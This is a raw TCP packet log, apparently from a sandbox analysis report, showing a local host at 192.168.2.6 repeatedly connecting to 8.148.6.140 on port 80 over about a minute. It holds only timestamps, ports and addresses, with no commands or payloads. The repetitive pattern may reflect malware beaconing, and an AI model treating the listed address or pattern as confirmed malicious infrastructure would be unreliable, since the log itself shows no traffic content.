          Jan 10, 2025 09:26:01.429155111 CET5001680192.168.2.68.148.6.140
          Jan 10, 2025 09:26:01.429548025 CET5001680192.168.2.68.148.6.140
          Jan 10, 2025 09:26:01.434360027 CET80500168.148.6.140192.168.2.6
          Jan 10, 2025 09:26:02.395895004 CET80500168.148.6.140192.168.2.6
          Jan 10, 2025 09:26:02.395987034 CET80500168.148.6.140192.168.2.6
          Jan 10, 2025 09:26:02.396032095 CET5001680192.168.2.68.148.6.140
          Jan 10, 2025 09:26:02.396073103 CET5001680192.168.2.68.148.6.140
          Jan 10, 2025 09:26:02.419466972 CET5001680192.168.2.68.148.6.140
          Jan 10, 2025 09:26:02.424411058 CET80500168.148.6.140192.168.2.6
          Jan 10, 2025 09:26:02.536065102 CET5001780192.168.2.68.148.6.140
          Jan 10, 2025 09:26:02.540910959 CET80500178.148.6.140192.168.2.6
          Jan 10, 2025 09:26:02.541012049 CET5001780192.168.2.68.148.6.140
          Jan 10, 2025 09:26:02.544296026 CET5001780192.168.2.68.148.6.140
          Jan 10, 2025 09:26:02.549105883 CET80500178.148.6.140192.168.2.6
          Jan 10, 2025 09:26:04.144680023 CET80500178.148.6.140192.168.2.6
          Jan 10, 2025 09:26:04.144728899 CET80500178.148.6.140192.168.2.6
          Jan 10, 2025 09:26:04.144751072 CET5001780192.168.2.68.148.6.140
          Jan 10, 2025 09:26:04.144777060 CET5001780192.168.2.68.148.6.140
          Jan 10, 2025 09:26:04.144901991 CET5001780192.168.2.68.148.6.140
          Jan 10, 2025 09:26:04.149610043 CET80500178.148.6.140192.168.2.6
          Jan 10, 2025 09:26:04.257961035 CET5001880192.168.2.68.148.6.140
          Jan 10, 2025 09:26:04.262945890 CET80500188.148.6.140192.168.2.6
          Jan 10, 2025 09:26:04.263091087 CET5001880192.168.2.68.148.6.140
          Jan 10, 2025 09:26:04.263178110 CET5001880192.168.2.68.148.6.140
          Jan 10, 2025 09:26:04.268057108 CET80500188.148.6.140192.168.2.6
          Jan 10, 2025 09:26:08.324578047 CET5001880192.168.2.68.148.6.140
          Jan 10, 2025 09:26:08.510780096 CET5001980192.168.2.68.148.6.140
          Jan 10, 2025 09:26:08.515815020 CET80500198.148.6.140192.168.2.6
          Jan 10, 2025 09:26:08.515917063 CET5001980192.168.2.68.148.6.140
          Jan 10, 2025 09:26:08.516064882 CET5001980192.168.2.68.148.6.140
          Jan 10, 2025 09:26:08.520910025 CET80500198.148.6.140192.168.2.6
          Jan 10, 2025 09:26:12.483911037 CET80500198.148.6.140192.168.2.6
          Jan 10, 2025 09:26:12.483927965 CET80500198.148.6.140192.168.2.6
          Jan 10, 2025 09:26:12.484111071 CET5001980192.168.2.68.148.6.140
          Jan 10, 2025 09:26:12.484288931 CET5001980192.168.2.68.148.6.140
          Jan 10, 2025 09:26:12.489027023 CET80500198.148.6.140192.168.2.6
          Jan 10, 2025 09:26:12.586726904 CET5002080192.168.2.68.148.6.140
          Jan 10, 2025 09:26:12.591837883 CET80500208.148.6.140192.168.2.6
          Jan 10, 2025 09:26:12.592005968 CET5002080192.168.2.68.148.6.140
          Jan 10, 2025 09:26:12.592144012 CET5002080192.168.2.68.148.6.140
          Jan 10, 2025 09:26:12.597019911 CET80500208.148.6.140192.168.2.6
          Jan 10, 2025 09:26:13.553263903 CET80500208.148.6.140192.168.2.6
          Jan 10, 2025 09:26:13.553280115 CET80500208.148.6.140192.168.2.6
          Jan 10, 2025 09:26:13.553374052 CET5002080192.168.2.68.148.6.140
          Jan 10, 2025 09:26:13.553550005 CET5002080192.168.2.68.148.6.140
          Jan 10, 2025 09:26:13.558728933 CET80500208.148.6.140192.168.2.6
          Jan 10, 2025 09:26:13.664518118 CET5002280192.168.2.68.148.6.140
          Jan 10, 2025 09:26:13.669464111 CET80500228.148.6.140192.168.2.6
          Jan 10, 2025 09:26:13.669574976 CET5002280192.168.2.68.148.6.140
          Jan 10, 2025 09:26:13.669687033 CET5002280192.168.2.68.148.6.140
          Jan 10, 2025 09:26:13.674851894 CET80500228.148.6.140192.168.2.6
          Jan 10, 2025 09:26:14.632354975 CET80500228.148.6.140192.168.2.6
          Jan 10, 2025 09:26:14.632369041 CET80500228.148.6.140192.168.2.6
          Jan 10, 2025 09:26:14.632415056 CET5002280192.168.2.68.148.6.140
          Jan 10, 2025 09:26:14.632436991 CET5002280192.168.2.68.148.6.140
          Jan 10, 2025 09:26:14.632548094 CET5002280192.168.2.68.148.6.140
          Jan 10, 2025 09:26:14.637298107 CET80500228.148.6.140192.168.2.6
          Jan 10, 2025 09:26:14.744685888 CET5002380192.168.2.68.148.6.140
          Jan 10, 2025 09:26:14.749839067 CET80500238.148.6.140192.168.2.6
          Jan 10, 2025 09:26:14.750015974 CET5002380192.168.2.68.148.6.140
          Jan 10, 2025 09:26:14.750066042 CET5002380192.168.2.68.148.6.140
          Jan 10, 2025 09:26:14.754842043 CET80500238.148.6.140192.168.2.6
          Jan 10, 2025 09:26:15.712852001 CET80500238.148.6.140192.168.2.6
          Jan 10, 2025 09:26:15.712863922 CET80500238.148.6.140192.168.2.6
          Jan 10, 2025 09:26:15.712934971 CET80500238.148.6.140192.168.2.6
          Jan 10, 2025 09:26:15.712939024 CET5002380192.168.2.68.148.6.140
          Jan 10, 2025 09:26:15.712975979 CET5002380192.168.2.68.148.6.140
          Jan 10, 2025 09:26:15.722497940 CET5002380192.168.2.68.148.6.140
          Jan 10, 2025 09:26:15.727328062 CET80500238.148.6.140192.168.2.6
          Jan 10, 2025 09:26:15.836091995 CET5002480192.168.2.68.148.6.140
          Jan 10, 2025 09:26:15.840897083 CET80500248.148.6.140192.168.2.6
          Jan 10, 2025 09:26:15.840996981 CET5002480192.168.2.68.148.6.140
          Jan 10, 2025 09:26:15.841090918 CET5002480192.168.2.68.148.6.140
          Jan 10, 2025 09:26:15.845882893 CET80500248.148.6.140192.168.2.6
          Jan 10, 2025 09:26:16.835022926 CET80500248.148.6.140192.168.2.6
          Jan 10, 2025 09:26:16.835037947 CET80500248.148.6.140192.168.2.6
          Jan 10, 2025 09:26:16.835045099 CET80500248.148.6.140192.168.2.6
          Jan 10, 2025 09:26:16.835134029 CET5002480192.168.2.68.148.6.140
          Jan 10, 2025 09:26:16.835557938 CET5002480192.168.2.68.148.6.140
          Jan 10, 2025 09:26:16.840361118 CET80500248.148.6.140192.168.2.6
          Jan 10, 2025 09:26:16.947524071 CET5002580192.168.2.68.148.6.140
          Jan 10, 2025 09:26:16.952724934 CET80500258.148.6.140192.168.2.6
          Jan 10, 2025 09:26:16.952841997 CET5002580192.168.2.68.148.6.140
          Jan 10, 2025 09:26:16.975497961 CET5002580192.168.2.68.148.6.140
          Jan 10, 2025 09:26:16.980402946 CET80500258.148.6.140192.168.2.6
          Jan 10, 2025 09:26:17.947873116 CET80500258.148.6.140192.168.2.6
          Jan 10, 2025 09:26:17.947891951 CET80500258.148.6.140192.168.2.6
          Jan 10, 2025 09:26:17.947968006 CET5002580192.168.2.68.148.6.140
          Jan 10, 2025 09:26:17.948108912 CET5002580192.168.2.68.148.6.140
          Jan 10, 2025 09:26:17.953362942 CET80500258.148.6.140192.168.2.6
          Jan 10, 2025 09:26:18.054968119 CET5002680192.168.2.68.148.6.140
          Jan 10, 2025 09:26:18.059933901 CET80500268.148.6.140192.168.2.6
          Jan 10, 2025 09:26:18.060020924 CET5002680192.168.2.68.148.6.140
          Jan 10, 2025 09:26:18.060146093 CET5002680192.168.2.68.148.6.140
          Jan 10, 2025 09:26:18.064996004 CET80500268.148.6.140192.168.2.6
          Jan 10, 2025 09:26:19.008219957 CET80500268.148.6.140192.168.2.6
          Jan 10, 2025 09:26:19.008289099 CET80500268.148.6.140192.168.2.6
          Jan 10, 2025 09:26:19.008323908 CET80500268.148.6.140192.168.2.6
          Jan 10, 2025 09:26:19.008436918 CET5002680192.168.2.68.148.6.140
          Jan 10, 2025 09:26:19.008436918 CET5002680192.168.2.68.148.6.140
          Jan 10, 2025 09:26:19.008625984 CET5002680192.168.2.68.148.6.140
          Jan 10, 2025 09:26:19.013546944 CET80500268.148.6.140192.168.2.6
          Jan 10, 2025 09:26:19.117366076 CET5002780192.168.2.68.148.6.140
          Jan 10, 2025 09:26:19.122629881 CET80500278.148.6.140192.168.2.6
          Jan 10, 2025 09:26:19.124802113 CET5002780192.168.2.68.148.6.140
          Jan 10, 2025 09:26:19.124938011 CET5002780192.168.2.68.148.6.140
          Jan 10, 2025 09:26:19.129900932 CET80500278.148.6.140192.168.2.6
          Jan 10, 2025 09:26:20.067663908 CET80500278.148.6.140192.168.2.6
          Jan 10, 2025 09:26:20.067689896 CET80500278.148.6.140192.168.2.6
          Jan 10, 2025 09:26:20.067948103 CET5002780192.168.2.68.148.6.140
          Jan 10, 2025 09:26:20.110785007 CET5002780192.168.2.68.148.6.140
          Jan 10, 2025 09:26:20.115776062 CET80500278.148.6.140192.168.2.6
          Jan 10, 2025 09:26:20.231334925 CET5002880192.168.2.68.148.6.140
          Jan 10, 2025 09:26:20.236210108 CET80500288.148.6.140192.168.2.6
          Jan 10, 2025 09:26:20.236289978 CET5002880192.168.2.68.148.6.140
          Jan 10, 2025 09:26:20.236419916 CET5002880192.168.2.68.148.6.140
          Jan 10, 2025 09:26:20.241245985 CET80500288.148.6.140192.168.2.6
          Jan 10, 2025 09:26:21.747904062 CET80500288.148.6.140192.168.2.6
          Jan 10, 2025 09:26:21.747980118 CET5002880192.168.2.68.148.6.140
          Jan 10, 2025 09:26:21.748054028 CET80500288.148.6.140192.168.2.6
          Jan 10, 2025 09:26:21.748146057 CET5002880192.168.2.68.148.6.140
          Jan 10, 2025 09:26:21.868688107 CET5002880192.168.2.68.148.6.140
          Jan 10, 2025 09:26:21.869049072 CET5002980192.168.2.68.148.6.140
          Jan 10, 2025 09:26:21.873605967 CET80500288.148.6.140192.168.2.6
          Jan 10, 2025 09:26:21.873910904 CET80500298.148.6.140192.168.2.6
          Jan 10, 2025 09:26:21.873980999 CET5002980192.168.2.68.148.6.140
          Jan 10, 2025 09:26:21.874087095 CET5002980192.168.2.68.148.6.140
          Jan 10, 2025 09:26:21.878880978 CET80500298.148.6.140192.168.2.6
          Jan 10, 2025 09:26:22.864389896 CET80500298.148.6.140192.168.2.6
          Jan 10, 2025 09:26:22.864434004 CET80500298.148.6.140192.168.2.6
          Jan 10, 2025 09:26:22.864510059 CET5002980192.168.2.68.148.6.140
          Jan 10, 2025 09:26:22.887018919 CET5002980192.168.2.68.148.6.140
          Jan 10, 2025 09:26:22.891829967 CET80500298.148.6.140192.168.2.6
          Jan 10, 2025 09:26:23.071881056 CET5003080192.168.2.68.148.6.140
          Jan 10, 2025 09:26:23.076858044 CET80500308.148.6.140192.168.2.6
          Jan 10, 2025 09:26:23.077271938 CET5003080192.168.2.68.148.6.140
          Jan 10, 2025 09:26:23.079349995 CET5003080192.168.2.68.148.6.140
          Jan 10, 2025 09:26:23.084202051 CET80500308.148.6.140192.168.2.6
          Jan 10, 2025 09:26:24.001163006 CET80500308.148.6.140192.168.2.6
          Jan 10, 2025 09:26:24.001249075 CET5003080192.168.2.68.148.6.140
          Jan 10, 2025 09:26:24.001437902 CET5003080192.168.2.68.148.6.140
          Jan 10, 2025 09:26:24.008352995 CET80500308.148.6.140192.168.2.6
          Jan 10, 2025 09:26:24.119894028 CET5003180192.168.2.68.148.6.140
          Jan 10, 2025 09:26:24.125047922 CET80500318.148.6.140192.168.2.6
          Jan 10, 2025 09:26:24.125127077 CET5003180192.168.2.68.148.6.140
          Jan 10, 2025 09:26:24.125369072 CET5003180192.168.2.68.148.6.140
          Jan 10, 2025 09:26:24.130162001 CET80500318.148.6.140192.168.2.6
          Jan 10, 2025 09:26:25.111063004 CET80500318.148.6.140192.168.2.6
          Jan 10, 2025 09:26:25.111202002 CET80500318.148.6.140192.168.2.6
          Jan 10, 2025 09:26:25.111213923 CET5003180192.168.2.68.148.6.140
          Jan 10, 2025 09:26:25.111325979 CET5003180192.168.2.68.148.6.140
          Jan 10, 2025 09:26:25.230324984 CET5003180192.168.2.68.148.6.140
          Jan 10, 2025 09:26:25.230849981 CET5003280192.168.2.68.148.6.140
          Jan 10, 2025 09:26:25.235209942 CET80500318.148.6.140192.168.2.6
          Jan 10, 2025 09:26:25.235737085 CET80500328.148.6.140192.168.2.6
          Jan 10, 2025 09:26:25.235817909 CET5003280192.168.2.68.148.6.140
          Jan 10, 2025 09:26:25.237972021 CET5003280192.168.2.68.148.6.140
          Jan 10, 2025 09:26:25.242763996 CET80500328.148.6.140192.168.2.6
          Jan 10, 2025 09:26:27.564515114 CET80500328.148.6.140192.168.2.6
          Jan 10, 2025 09:26:27.564663887 CET5003280192.168.2.68.148.6.140
          Jan 10, 2025 09:26:27.564673901 CET80500328.148.6.140192.168.2.6
          Jan 10, 2025 09:26:27.564723015 CET5003280192.168.2.68.148.6.140
          Jan 10, 2025 09:26:27.564949989 CET5003280192.168.2.68.148.6.140
          Jan 10, 2025 09:26:27.569664955 CET80500328.148.6.140192.168.2.6
          Jan 10, 2025 09:26:27.683604002 CET5003380192.168.2.68.148.6.140
          Jan 10, 2025 09:26:27.688416004 CET80500338.148.6.140192.168.2.6
          Jan 10, 2025 09:26:27.688498020 CET5003380192.168.2.68.148.6.140
          Jan 10, 2025 09:26:27.688795090 CET5003380192.168.2.68.148.6.140
          Jan 10, 2025 09:26:27.693561077 CET80500338.148.6.140192.168.2.6
          Jan 10, 2025 09:26:31.650252104 CET80500338.148.6.140192.168.2.6
          Jan 10, 2025 09:26:31.650276899 CET80500338.148.6.140192.168.2.6
          Jan 10, 2025 09:26:31.650330067 CET5003380192.168.2.68.148.6.140
          Jan 10, 2025 09:26:31.659009933 CET5003380192.168.2.68.148.6.140
          Jan 10, 2025 09:26:31.663733006 CET80500338.148.6.140192.168.2.6
          Jan 10, 2025 09:26:31.778351068 CET5003580192.168.2.68.148.6.140
          Jan 10, 2025 09:26:31.783360004 CET80500358.148.6.140192.168.2.6
          Jan 10, 2025 09:26:31.784796953 CET5003580192.168.2.68.148.6.140
          Jan 10, 2025 09:26:31.788022995 CET5003580192.168.2.68.148.6.140
          Jan 10, 2025 09:26:31.792829990 CET80500358.148.6.140192.168.2.6
          Jan 10, 2025 09:26:33.370791912 CET80500358.148.6.140192.168.2.6
          Jan 10, 2025 09:26:33.370851040 CET5003580192.168.2.68.148.6.140
          Jan 10, 2025 09:26:33.370912075 CET80500358.148.6.140192.168.2.6
          Jan 10, 2025 09:26:33.371078968 CET5003580192.168.2.68.148.6.140
          Jan 10, 2025 09:26:33.372934103 CET5003580192.168.2.68.148.6.140
          Jan 10, 2025 09:26:33.377780914 CET80500358.148.6.140192.168.2.6
          Jan 10, 2025 09:26:33.517013073 CET5003680192.168.2.68.148.6.140
          Jan 10, 2025 09:26:33.521897078 CET80500368.148.6.140192.168.2.6
          Jan 10, 2025 09:26:33.521969080 CET5003680192.168.2.68.148.6.140
          Jan 10, 2025 09:26:33.522105932 CET5003680192.168.2.68.148.6.140
          Jan 10, 2025 09:26:33.526895046 CET80500368.148.6.140192.168.2.6
          Jan 10, 2025 09:26:34.485897064 CET80500368.148.6.140192.168.2.6
          Jan 10, 2025 09:26:34.485986948 CET80500368.148.6.140192.168.2.6
          Jan 10, 2025 09:26:34.486022949 CET5003680192.168.2.68.148.6.140
          Jan 10, 2025 09:26:34.491816998 CET5003680192.168.2.68.148.6.140
          Jan 10, 2025 09:26:34.603147984 CET5003680192.168.2.68.148.6.140
          Jan 10, 2025 09:26:34.603661060 CET5003780192.168.2.68.148.6.140
          Jan 10, 2025 09:26:34.608058929 CET80500368.148.6.140192.168.2.6
          Jan 10, 2025 09:26:34.608462095 CET80500378.148.6.140192.168.2.6
          Jan 10, 2025 09:26:34.609361887 CET5003780192.168.2.68.148.6.140
          Jan 10, 2025 09:26:34.609361887 CET5003780192.168.2.68.148.6.140
          Jan 10, 2025 09:26:34.614222050 CET80500378.148.6.140192.168.2.6
          Jan 10, 2025 09:26:38.553550959 CET80500378.148.6.140192.168.2.6
          Jan 10, 2025 09:26:38.553575993 CET80500378.148.6.140192.168.2.6
          Jan 10, 2025 09:26:38.553683043 CET5003780192.168.2.68.148.6.140
          Jan 10, 2025 09:26:38.553767920 CET5003780192.168.2.68.148.6.140
          Jan 10, 2025 09:26:38.558522940 CET80500378.148.6.140192.168.2.6
          Jan 10, 2025 09:26:38.683163881 CET5003880192.168.2.68.148.6.140
          Jan 10, 2025 09:26:38.688488007 CET80500388.148.6.140192.168.2.6
          Jan 10, 2025 09:26:38.691297054 CET5003880192.168.2.68.148.6.140
          Jan 10, 2025 09:26:38.691401005 CET5003880192.168.2.68.148.6.140
          Jan 10, 2025 09:26:38.696599960 CET80500388.148.6.140192.168.2.6
          Jan 10, 2025 09:26:39.643378973 CET80500388.148.6.140192.168.2.6
          Jan 10, 2025 09:26:39.643477917 CET80500388.148.6.140192.168.2.6
          Jan 10, 2025 09:26:39.643486023 CET5003880192.168.2.68.148.6.140
          Jan 10, 2025 09:26:39.643529892 CET5003880192.168.2.68.148.6.140
          Jan 10, 2025 09:26:39.643606901 CET5003880192.168.2.68.148.6.140
          Jan 10, 2025 09:26:39.648366928 CET80500388.148.6.140192.168.2.6
          Jan 10, 2025 09:26:39.760520935 CET5003980192.168.2.68.148.6.140
          Jan 10, 2025 09:26:39.765386105 CET80500398.148.6.140192.168.2.6
          Jan 10, 2025 09:26:39.765455008 CET5003980192.168.2.68.148.6.140
          Jan 10, 2025 09:26:39.765594959 CET5003980192.168.2.68.148.6.140
          Jan 10, 2025 09:26:39.770365953 CET80500398.148.6.140192.168.2.6
          Jan 10, 2025 09:26:40.722172022 CET80500398.148.6.140192.168.2.6
          Jan 10, 2025 09:26:40.722203016 CET80500398.148.6.140192.168.2.6
          Jan 10, 2025 09:26:40.722826004 CET5003980192.168.2.68.148.6.140
          Jan 10, 2025 09:26:40.723155975 CET5003980192.168.2.68.148.6.140
          Jan 10, 2025 09:26:40.729857922 CET80500398.148.6.140192.168.2.6
          Jan 10, 2025 09:26:40.851182938 CET5004080192.168.2.68.148.6.140
          Jan 10, 2025 09:26:40.856065989 CET80500408.148.6.140192.168.2.6
          Jan 10, 2025 09:26:40.859349966 CET5004080192.168.2.68.148.6.140
          Jan 10, 2025 09:26:40.863178968 CET5004080192.168.2.68.148.6.140
          Jan 10, 2025 09:26:40.867939949 CET80500408.148.6.140192.168.2.6
          Jan 10, 2025 09:26:41.842161894 CET80500408.148.6.140192.168.2.6
          Jan 10, 2025 09:26:41.842221022 CET5004080192.168.2.68.148.6.140
          Jan 10, 2025 09:26:41.842313051 CET80500408.148.6.140192.168.2.6
          Jan 10, 2025 09:26:41.842359066 CET5004080192.168.2.68.148.6.140
          Jan 10, 2025 09:26:41.947555065 CET5004080192.168.2.68.148.6.140
          Jan 10, 2025 09:26:41.948003054 CET5004180192.168.2.68.148.6.140
          Jan 10, 2025 09:26:41.952337980 CET80500408.148.6.140192.168.2.6
          Jan 10, 2025 09:26:41.952815056 CET80500418.148.6.140192.168.2.6
          Jan 10, 2025 09:26:41.952990055 CET5004180192.168.2.68.148.6.140
          Jan 10, 2025 09:26:41.953031063 CET5004180192.168.2.68.148.6.140
          Jan 10, 2025 09:26:41.957741022 CET80500418.148.6.140192.168.2.6
          Jan 10, 2025 09:26:42.940922976 CET80500418.148.6.140192.168.2.6
          Jan 10, 2025 09:26:42.940999031 CET80500418.148.6.140192.168.2.6
          Jan 10, 2025 09:26:42.941097975 CET5004180192.168.2.68.148.6.140
          Jan 10, 2025 09:26:42.941313028 CET5004180192.168.2.68.148.6.140
          Jan 10, 2025 09:26:42.946038961 CET80500418.148.6.140192.168.2.6
          Jan 10, 2025 09:26:43.063050985 CET5004280192.168.2.68.148.6.140
          Jan 10, 2025 09:26:43.067805052 CET80500428.148.6.140192.168.2.6
          Jan 10, 2025 09:26:43.068063974 CET5004280192.168.2.68.148.6.140
          Jan 10, 2025 09:26:43.068310976 CET5004280192.168.2.68.148.6.140
          Jan 10, 2025 09:26:43.073060036 CET80500428.148.6.140192.168.2.6
          Jan 10, 2025 09:26:44.037074089 CET80500428.148.6.140192.168.2.6
          Jan 10, 2025 09:26:44.037122965 CET5004280192.168.2.68.148.6.140
          Jan 10, 2025 09:26:44.037169933 CET80500428.148.6.140192.168.2.6
          Jan 10, 2025 09:26:44.037213087 CET5004280192.168.2.68.148.6.140
          Jan 10, 2025 09:26:44.037271976 CET80500428.148.6.140192.168.2.6
          Jan 10, 2025 09:26:44.037311077 CET5004280192.168.2.68.148.6.140
          Jan 10, 2025 09:26:44.037374973 CET5004280192.168.2.68.148.6.140
          Jan 10, 2025 09:26:44.042093992 CET80500428.148.6.140192.168.2.6
          Jan 10, 2025 09:26:44.151787996 CET5004380192.168.2.68.148.6.140
          Jan 10, 2025 09:26:44.157315969 CET80500438.148.6.140192.168.2.6
          Jan 10, 2025 09:26:44.157485962 CET5004380192.168.2.68.148.6.140
          Jan 10, 2025 09:26:44.157594919 CET5004380192.168.2.68.148.6.140
          Jan 10, 2025 09:26:44.163160086 CET80500438.148.6.140192.168.2.6
          Jan 10, 2025 09:26:45.114870071 CET80500438.148.6.140192.168.2.6
          Jan 10, 2025 09:26:45.114898920 CET80500438.148.6.140192.168.2.6
          Jan 10, 2025 09:26:45.115075111 CET5004380192.168.2.68.148.6.140
          Jan 10, 2025 09:26:45.115184069 CET5004380192.168.2.68.148.6.140
          Jan 10, 2025 09:26:45.115813971 CET5004380192.168.2.68.148.6.140
          Jan 10, 2025 09:26:45.120546103 CET80500438.148.6.140192.168.2.6
          Jan 10, 2025 09:26:45.230488062 CET5004480192.168.2.68.148.6.140
          Jan 10, 2025 09:26:45.235420942 CET80500448.148.6.140192.168.2.6
          Jan 10, 2025 09:26:45.239339113 CET5004480192.168.2.68.148.6.140
          Jan 10, 2025 09:26:45.239943027 CET5004480192.168.2.68.148.6.140
          Jan 10, 2025 09:26:45.244690895 CET80500448.148.6.140192.168.2.6
          Jan 10, 2025 09:26:46.176141977 CET80500448.148.6.140192.168.2.6
          Jan 10, 2025 09:26:46.176219940 CET5004480192.168.2.68.148.6.140
          Jan 10, 2025 09:26:46.176253080 CET80500448.148.6.140192.168.2.6
          Jan 10, 2025 09:26:46.176299095 CET5004480192.168.2.68.148.6.140
          Jan 10, 2025 09:26:46.176426888 CET5004480192.168.2.68.148.6.140
          Jan 10, 2025 09:26:46.181204081 CET80500448.148.6.140192.168.2.6
          Jan 10, 2025 09:26:46.309298038 CET5004580192.168.2.68.148.6.140
          Jan 10, 2025 09:26:46.314295053 CET80500458.148.6.140192.168.2.6
          Jan 10, 2025 09:26:46.318027020 CET5004580192.168.2.68.148.6.140
          Jan 10, 2025 09:26:46.318027020 CET5004580192.168.2.68.148.6.140
          Jan 10, 2025 09:26:46.322813034 CET80500458.148.6.140192.168.2.6
          Jan 10, 2025 09:26:47.297995090 CET80500458.148.6.140192.168.2.6
          Jan 10, 2025 09:26:47.298146009 CET80500458.148.6.140192.168.2.6
          Jan 10, 2025 09:26:47.298156977 CET80500458.148.6.140192.168.2.6
          Jan 10, 2025 09:26:47.298160076 CET5004580192.168.2.68.148.6.140
          Jan 10, 2025 09:26:47.298252106 CET5004580192.168.2.68.148.6.140
          Jan 10, 2025 09:26:47.298252106 CET5004580192.168.2.68.148.6.140
          Jan 10, 2025 09:26:47.298403978 CET5004580192.168.2.68.148.6.140
          Jan 10, 2025 09:26:47.303145885 CET80500458.148.6.140192.168.2.6
          Jan 10, 2025 09:26:47.416507006 CET5004680192.168.2.68.148.6.140
          Jan 10, 2025 09:26:47.421351910 CET80500468.148.6.140192.168.2.6
          Jan 10, 2025 09:26:47.421423912 CET5004680192.168.2.68.148.6.140
          Jan 10, 2025 09:26:47.421591043 CET5004680192.168.2.68.148.6.140
          Jan 10, 2025 09:26:47.426361084 CET80500468.148.6.140192.168.2.6
          Jan 10, 2025 09:26:48.383600950 CET80500468.148.6.140192.168.2.6
          Jan 10, 2025 09:26:48.383712053 CET80500468.148.6.140192.168.2.6
          Jan 10, 2025 09:26:48.383853912 CET80500468.148.6.140192.168.2.6
          Jan 10, 2025 09:26:48.384185076 CET5004680192.168.2.68.148.6.140
          Jan 10, 2025 09:26:48.384185076 CET5004680192.168.2.68.148.6.140
          Jan 10, 2025 09:26:48.388993979 CET80500468.148.6.140192.168.2.6
          Jan 10, 2025 09:26:48.499144077 CET5004780192.168.2.68.148.6.140
          Jan 10, 2025 09:26:48.503995895 CET80500478.148.6.140192.168.2.6
          Jan 10, 2025 09:26:48.507354021 CET5004780192.168.2.68.148.6.140
          Jan 10, 2025 09:26:48.507354021 CET5004780192.168.2.68.148.6.140
          Jan 10, 2025 09:26:48.512219906 CET80500478.148.6.140192.168.2.6
          Jan 10, 2025 09:26:50.069509029 CET80500478.148.6.140192.168.2.6
          Jan 10, 2025 09:26:50.069530010 CET80500478.148.6.140192.168.2.6
          Jan 10, 2025 09:26:50.069578886 CET5004780192.168.2.68.148.6.140
          Jan 10, 2025 09:26:50.069663048 CET5004780192.168.2.68.148.6.140
          Jan 10, 2025 09:26:50.069850922 CET5004780192.168.2.68.148.6.140
          Jan 10, 2025 09:26:50.074609995 CET80500478.148.6.140192.168.2.6
          Jan 10, 2025 09:26:50.183332920 CET5004880192.168.2.68.148.6.140
          Jan 10, 2025 09:26:50.188138008 CET80500488.148.6.140192.168.2.6
          Jan 10, 2025 09:26:50.188219070 CET5004880192.168.2.68.148.6.140
          Jan 10, 2025 09:26:50.188379049 CET5004880192.168.2.68.148.6.140
          Jan 10, 2025 09:26:50.193147898 CET80500488.148.6.140192.168.2.6
          Jan 10, 2025 09:26:54.194684982 CET5004880192.168.2.68.148.6.140
          Jan 10, 2025 09:26:54.311119080 CET5004980192.168.2.68.148.6.140
          Jan 10, 2025 09:26:54.315967083 CET80500498.148.6.140192.168.2.6
          Jan 10, 2025 09:26:54.318133116 CET5004980192.168.2.68.148.6.140
          Jan 10, 2025 09:26:54.318365097 CET5004980192.168.2.68.148.6.140
          Jan 10, 2025 09:26:54.323170900 CET80500498.148.6.140192.168.2.6
          Jan 10, 2025 09:26:55.285631895 CET80500498.148.6.140192.168.2.6
          Jan 10, 2025 09:26:55.285667896 CET80500498.148.6.140192.168.2.6
          Jan 10, 2025 09:26:55.285710096 CET5004980192.168.2.68.148.6.140
          Jan 10, 2025 09:26:55.285758018 CET5004980192.168.2.68.148.6.140
          Jan 10, 2025 09:26:55.285867929 CET5004980192.168.2.68.148.6.140
          Jan 10, 2025 09:26:55.290560961 CET80500498.148.6.140192.168.2.6
          Jan 10, 2025 09:26:55.400240898 CET5005080192.168.2.68.148.6.140
          Jan 10, 2025 09:26:55.405255079 CET80500508.148.6.140192.168.2.6
          Jan 10, 2025 09:26:55.405424118 CET5005080192.168.2.68.148.6.140
          Jan 10, 2025 09:26:55.405477047 CET5005080192.168.2.68.148.6.140
          Jan 10, 2025 09:26:55.410276890 CET80500508.148.6.140192.168.2.6
          Jan 10, 2025 09:26:56.980648994 CET80500508.148.6.140192.168.2.6
          Jan 10, 2025 09:26:56.980712891 CET80500508.148.6.140192.168.2.6
          Jan 10, 2025 09:26:56.980834007 CET5005080192.168.2.68.148.6.140
          Jan 10, 2025 09:26:56.981275082 CET5005080192.168.2.68.148.6.140
          Jan 10, 2025 09:26:56.986027002 CET80500508.148.6.140192.168.2.6
          Jan 10, 2025 09:26:57.091375113 CET5005180192.168.2.68.148.6.140
          Jan 10, 2025 09:26:57.096236944 CET80500518.148.6.140192.168.2.6
          Jan 10, 2025 09:26:57.099231005 CET5005180192.168.2.68.148.6.140
          Jan 10, 2025 09:26:57.099344015 CET5005180192.168.2.68.148.6.140
          Jan 10, 2025 09:26:57.104146957 CET80500518.148.6.140192.168.2.6
          Jan 10, 2025 09:26:58.651422024 CET80500518.148.6.140192.168.2.6
          Jan 10, 2025 09:26:58.651492119 CET80500518.148.6.140192.168.2.6
          Jan 10, 2025 09:26:58.651676893 CET5005180192.168.2.68.148.6.140
          Jan 10, 2025 09:26:58.651843071 CET5005180192.168.2.68.148.6.140
          Jan 10, 2025 09:26:58.656634092 CET80500518.148.6.140192.168.2.6
          Jan 10, 2025 09:26:58.763065100 CET5005280192.168.2.68.148.6.140
          Jan 10, 2025 09:26:58.768063068 CET80500528.148.6.140192.168.2.6
          Jan 10, 2025 09:26:58.768435001 CET5005280192.168.2.68.148.6.140
          Jan 10, 2025 09:26:58.768821955 CET5005280192.168.2.68.148.6.140
          Jan 10, 2025 09:26:58.773691893 CET80500528.148.6.140192.168.2.6
          Jan 10, 2025 09:26:59.749748945 CET80500528.148.6.140192.168.2.6
          Jan 10, 2025 09:26:59.749792099 CET80500528.148.6.140192.168.2.6
          Jan 10, 2025 09:26:59.749809980 CET5005280192.168.2.68.148.6.140
          Jan 10, 2025 09:26:59.749864101 CET5005280192.168.2.68.148.6.140
          Jan 10, 2025 09:26:59.749934912 CET5005280192.168.2.68.148.6.140
          Jan 10, 2025 09:26:59.754786015 CET80500528.148.6.140192.168.2.6
          Jan 10, 2025 09:26:59.854545116 CET5005380192.168.2.68.148.6.140
          Jan 10, 2025 09:26:59.863179922 CET80500538.148.6.140192.168.2.6
          Jan 10, 2025 09:26:59.863254070 CET5005380192.168.2.68.148.6.140
          Jan 10, 2025 09:26:59.863451004 CET5005380192.168.2.68.148.6.140
          Jan 10, 2025 09:26:59.871283054 CET80500538.148.6.140192.168.2.6
          Jan 10, 2025 09:27:00.837529898 CET80500538.148.6.140192.168.2.6
          Jan 10, 2025 09:27:00.837760925 CET80500538.148.6.140192.168.2.6
          Jan 10, 2025 09:27:00.837970972 CET5005380192.168.2.68.148.6.140
          Jan 10, 2025 09:27:00.837970972 CET5005380192.168.2.68.148.6.140
